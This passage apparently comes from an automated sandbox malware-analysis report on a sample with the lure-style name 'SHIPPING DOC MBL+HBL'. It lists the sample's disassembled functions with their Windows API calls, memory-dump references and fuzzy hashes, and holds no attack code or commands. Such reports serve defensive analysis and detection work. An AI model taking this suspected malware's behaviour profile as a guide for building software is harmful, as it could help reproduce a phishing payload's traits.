                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 3f1207f54c37deb5206156a9b644fccf30261fc600c6f9750ab1ac772c685f23
                    • Instruction ID: e5ef145d514e2d530da9c7548513bb32955ca3d30eab3785c0b46f6c41132c28
                    • Opcode Fuzzy Hash: 3f1207f54c37deb5206156a9b644fccf30261fc600c6f9750ab1ac772c685f23
                    • Instruction Fuzzy Hash: D621D171200705BFEB159F68CC10FBAB7ADFF88700F00902AFA59B6650DB31D9129791
                    Function 00E63A6E Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNEL32(?,00E8FAC0), ref: 00E63AA8
                    • GetLastError.KERNEL32 ref: 00E63AB7
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E63AC6
                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E8FAC0), ref: 00E63B23
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CreateDirectory$AttributesErrorFileLast
                    • String ID:
                    • API String ID: 2267087916-0
                    • Opcode ID: 59f5add5f45b313d1bbbec0359de91f1c9316942fe22c13c09c5129d49fb8d2e
                    • Instruction ID: 99483153295dfc8e441af1e7f092c7c3884aa1ac3ee38a0503375bded236d60d
                    • Opcode Fuzzy Hash: 59f5add5f45b313d1bbbec0359de91f1c9316942fe22c13c09c5129d49fb8d2e
                    • Instruction Fuzzy Hash: 9C2182305482019FC710DF34D88089BB7E4EF557A8F145A5AF49DE72A2D7309E49CB92
                    Function 00E35262 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 00E35281
                      • Part of subcall function 00E2588C: __FF_MSGBANNER.LIBCMT ref: 00E258A3
                      • Part of subcall function 00E2588C: __NMSG_WRITE.LIBCMT ref: 00E258AA
                      • Part of subcall function 00E2588C: RtlAllocateHeap.NTDLL(00FB0000,00000000,00000001,00000000,?,?,?,00E20F53,?), ref: 00E258CF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: 0e11318f3e147728161f671ae2565e7390c56262efcc6a3c54b7b58d602d7bb5
                    • Instruction ID: e69b4b07b2342886778ec63690d151447f1c8a7ac704b59f7fb19e1971148d7c
                    • Opcode Fuzzy Hash: 0e11318f3e147728161f671ae2565e7390c56262efcc6a3c54b7b58d602d7bb5
                    • Instruction Fuzzy Hash: F011C133506A25AFCB212FB0BD0966B3BE8AB11364F206539F919BA260DF348940C791
                    Function 00E04531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E04560
                      • Part of subcall function 00E0410D: _memset.LIBCMT ref: 00E0418D
                      • Part of subcall function 00E0410D: _wcscpy.LIBCMT ref: 00E041E1
                      • Part of subcall function 00E0410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E041F1
                    • KillTimer.USER32(?,00000001,?,?), ref: 00E045B5
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E045C4
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E3D5FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: 8955ce8d56c4528fa3c87f842843c6fb88a37e90b54c3f6dcc9db23ef4912231
                    • Instruction ID: 8667e77ab3ac1a3e6d3d1d0aabf11f1eb920bfb0bb8e09deabea62b0c90e5b70
                    • Opcode Fuzzy Hash: 8955ce8d56c4528fa3c87f842843c6fb88a37e90b54c3f6dcc9db23ef4912231
                    • Instruction Fuzzy Hash: 1021A4B1508784AFE7328B649C59BE6BFEC9B01308F04109EE699B6181D7751988CB51
                    Function 00E7647F Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E6793F,?,?,00000000), ref: 00E05B8C
                      • Part of subcall function 00E05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E6793F,?,?,00000000,?,?), ref: 00E05BB0
                    • gethostbyname.WSOCK32(?,?,?), ref: 00E764AF
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E764BA
                    • _memmove.LIBCMT ref: 00E764E7
                    • inet_ntoa.WSOCK32(?), ref: 00E764F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    • Opcode ID: 18ba726244d960a364005d457f14f68262ada795864906ba993dcf06e30e3834
                    • Instruction ID: 05281ecd053cb0886be372229f5198e8d39eda967e0f6f915270defc324bd215
                    • Opcode Fuzzy Hash: 18ba726244d960a364005d457f14f68262ada795864906ba993dcf06e30e3834
                    • Instruction Fuzzy Hash: F3114C32900109AFCB04EBA4DD86DAEB7F8AF58310B149065F50AB71A2DB30AE54CB61
                    Function 00E58E03 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00E58E23
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58E35
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58E4B
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58E66
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: a8e484f1c7756c95ffb225ee4373d3dd1a1ef74ab5c4e050c1a683c5d5941beb
                    • Instruction ID: fc31c7a599048e38fe1fc5fda7ae8cc16c6e273213cb9ad3e2a83d5d848bbd4b
                    • Opcode Fuzzy Hash: a8e484f1c7756c95ffb225ee4373d3dd1a1ef74ab5c4e050c1a683c5d5941beb
                    • Instruction Fuzzy Hash: F6115A79900218FFEB10DFA5CD85E9DBBB8FB08710F204095E904B7290DA716E14DB90
                    Function 00E01290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • DefDlgProcW.USER32(?,00000020,?), ref: 00E012D8
                    • GetClientRect.USER32(?,?), ref: 00E3B77B
                    • GetCursorPos.USER32(?), ref: 00E3B785
                    • ScreenToClient.USER32(?,?), ref: 00E3B790
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    • Opcode ID: 27621b47873811e54f83eee6cd4113871cc0cf1f6dad48763e55ddc040bb8601
                    • Instruction ID: 11fe529fbf7f536ec88f61234ce2c24e17d9aab10d0703c5ec1601ecea5f095e
                    • Opcode Fuzzy Hash: 27621b47873811e54f83eee6cd4113871cc0cf1f6dad48763e55ddc040bb8601
                    • Instruction Fuzzy Hash: E0113D35500019EFCB10DF94D8899FE77F8EB05300F4015A6F905FB2A0D730BA95ABA5
                    Function 00E61473 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E6001E,?,00E61071,?,00008000), ref: 00E61490
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E6001E,?,00E61071,?,00008000), ref: 00E614B5
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E6001E,?,00E61071,?,00008000), ref: 00E614BF
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00E6001E,?,00E61071,?,00008000), ref: 00E614F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID:
                    • API String ID: 2875609808-0
                    • Opcode ID: ac75bf695163b3aab827627197e8297f9fdd6f55278e5ab0bcf223bd9db55b82
                    • Instruction ID: 6fb97438ac163b1f5662e27a92a9388b37644a1c18d805b768483bbbd155a3ad
                    • Opcode Fuzzy Hash: ac75bf695163b3aab827627197e8297f9fdd6f55278e5ab0bcf223bd9db55b82
                    • Instruction Fuzzy Hash: EF119731C41569DBCF00AFA6E988AEEBB78FF08752F085196E954B3241CF3095608BA1
                    Function 00E37137 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: f6e154d70688f0cd606853472772f801065ffe3d0982e1270144850e2b32dfb1
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 2E0169B204914ABBCF225E84CC098EE3F66BB18344F099415FE9869121C336C9B1FB81
                    Function 00E8B2F9 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00E8B318
                    • ScreenToClient.USER32(?,?), ref: 00E8B330
                    • ScreenToClient.USER32(?,?), ref: 00E8B354
                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E8B36F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: 77d6ae4130d3fb4cdb9687fe928ea240556a9918f39c242d008ffb7e02ccca4a
                    • Instruction ID: 1ddcda430bd68867a13db19a40e3895639ba0aaf04e6a391aad65946618939f0
                    • Opcode Fuzzy Hash: 77d6ae4130d3fb4cdb9687fe928ea240556a9918f39c242d008ffb7e02ccca4a
                    • Instruction Fuzzy Hash: 85114675D00209EFDB41DF99C4449EEBBB5FF08310F104166E915E3220D775AA559F91
                    Function 00E66C83 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(?), ref: 00E66C8F
                      • Part of subcall function 00E6776D: _memset.LIBCMT ref: 00E677A2
                    • _memmove.LIBCMT ref: 00E66CB2
                    • _memset.LIBCMT ref: 00E66CBF
                    • LeaveCriticalSection.KERNEL32(?), ref: 00E66CCF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    • Opcode ID: 59644fff6fc7ffe77510eb253b438a181f343fad39c0cbf3a5210778f16e56ab
                    • Instruction ID: b1b17fa6dd0ec2dbacf321939619e23a2ce556ca8eb0c1c2e8d842946fb7d41d
                    • Opcode Fuzzy Hash: 59644fff6fc7ffe77510eb253b438a181f343fad39c0cbf3a5210778f16e56ab
                    • Instruction Fuzzy Hash: D4F05E3A204114ABCF016F55ED85E8ABB6AEF45360F148065FE08BE22BC735E811CBB4
                    Function 00E5A15C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E5A179
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5A18C
                    • GetCurrentThreadId.KERNEL32 ref: 00E5A193
                    • AttachThreadInput.USER32(00000000), ref: 00E5A19A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
                    • Opcode ID: 23ab8f83f2f1f7cca3883a82c53f2c8df14ff17f009b06328dcc57790d3b37a6
                    • Instruction ID: a1c43f4d034ce4bc543355b36068ba42b2592f64fcf3564c31ca038b0eaf5a44
                    • Opcode Fuzzy Hash: 23ab8f83f2f1f7cca3883a82c53f2c8df14ff17f009b06328dcc57790d3b37a6
                    • Instruction Fuzzy Hash: 71E039B1542228BADB201FA2DD0CED73F1CEF267A2F048234F90DA4060D675C558DBE0
                    Function 00E02218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00E02231
                    • SetTextColor.GDI32(?,000000FF), ref: 00E0223B
                    • SetBkMode.GDI32(?,00000001), ref: 00E02250
                    • GetStockObject.GDI32(00000005), ref: 00E02258
                    • GetWindowDC.USER32(?,00000000), ref: 00E3C003
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E3C010
                    • GetPixel.GDI32(00000000,?,00000000), ref: 00E3C029
                    • GetPixel.GDI32(00000000,00000000,?), ref: 00E3C042
                    • GetPixel.GDI32(00000000,?,?), ref: 00E3C062
                    • ReleaseDC.USER32(?,00000000), ref: 00E3C06D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: 3698e548f17046d1e7889bcd012a28546eee00f4fe6fa97fc18d8f11ff924215
                    • Instruction ID: dcfd6a436f915e7c402a90438fdf1e349766f960a0e9ca3e07e32432876d64ae
                    • Opcode Fuzzy Hash: 3698e548f17046d1e7889bcd012a28546eee00f4fe6fa97fc18d8f11ff924215
                    • Instruction Fuzzy Hash: B0E03932200244EEEB216FA5EC0D7D83B10EB05336F108366FA6D680E287714994DB11
                    Function 00E58A3A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 00E58A43
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E5860E), ref: 00E58A4A
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E5860E), ref: 00E58A57
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E5860E), ref: 00E58A5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: 852833ebab0700e9961a19db4c56369ab8c0d1158ca87f2e38e351abd768ad8c
                    • Instruction ID: 337d9a5408b4fd23b95e7335afb7d350ff17cf92718f676ee60464c508416240
                    • Opcode Fuzzy Hash: 852833ebab0700e9961a19db4c56369ab8c0d1158ca87f2e38e351abd768ad8c
                    • Instruction Fuzzy Hash: E5E04F36A012119FD7605FB26D0CB563BA8AF54796F244828E649F9055DA2494498750
                    Function 00E420B6 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                    Download Yara Rule
                    APIs
                    • GetDesktopWindow.USER32 ref: 00E420B6
                    • GetDC.USER32(00000000), ref: 00E420C0
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E420E0
                    • ReleaseDC.USER32(?), ref: 00E42101
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: f0c3578fb8ec2a98c14c995ddbb0d8f25a383bf7627cdb881c7614074460fb0f
                    • Instruction ID: dfc18b514c4c66c611237218244ed0d58a2976cd9d03688a033e516dd9024b69
                    • Opcode Fuzzy Hash: f0c3578fb8ec2a98c14c995ddbb0d8f25a383bf7627cdb881c7614074460fb0f
                    • Instruction Fuzzy Hash: A2E0E575800204EFCB01AF61D80869D7BF1EF5C310F208229F95AB7261DB388195AF80
                    Function 00E420CA Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetDesktopWindow.USER32 ref: 00E420CA
                    • GetDC.USER32(00000000), ref: 00E420D4
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E420E0
                    • ReleaseDC.USER32(?), ref: 00E42101
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: a3fb36e3c45f9e7bb5c0f48bf6de18527901f3b3189c15b96a7bd3232a62a77a
                    • Instruction ID: 8c4f331f4e36ce1d2622bf209154b0c5a85c78770e382e98345e0c52d17137c0
                    • Opcode Fuzzy Hash: a3fb36e3c45f9e7bb5c0f48bf6de18527901f3b3189c15b96a7bd3232a62a77a
                    • Instruction Fuzzy Hash: 2CE01A75800204AFCF019F71C80869D7BF1EF5C310F108225F95EB7261DB389195AF80
                    Function 00E063A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
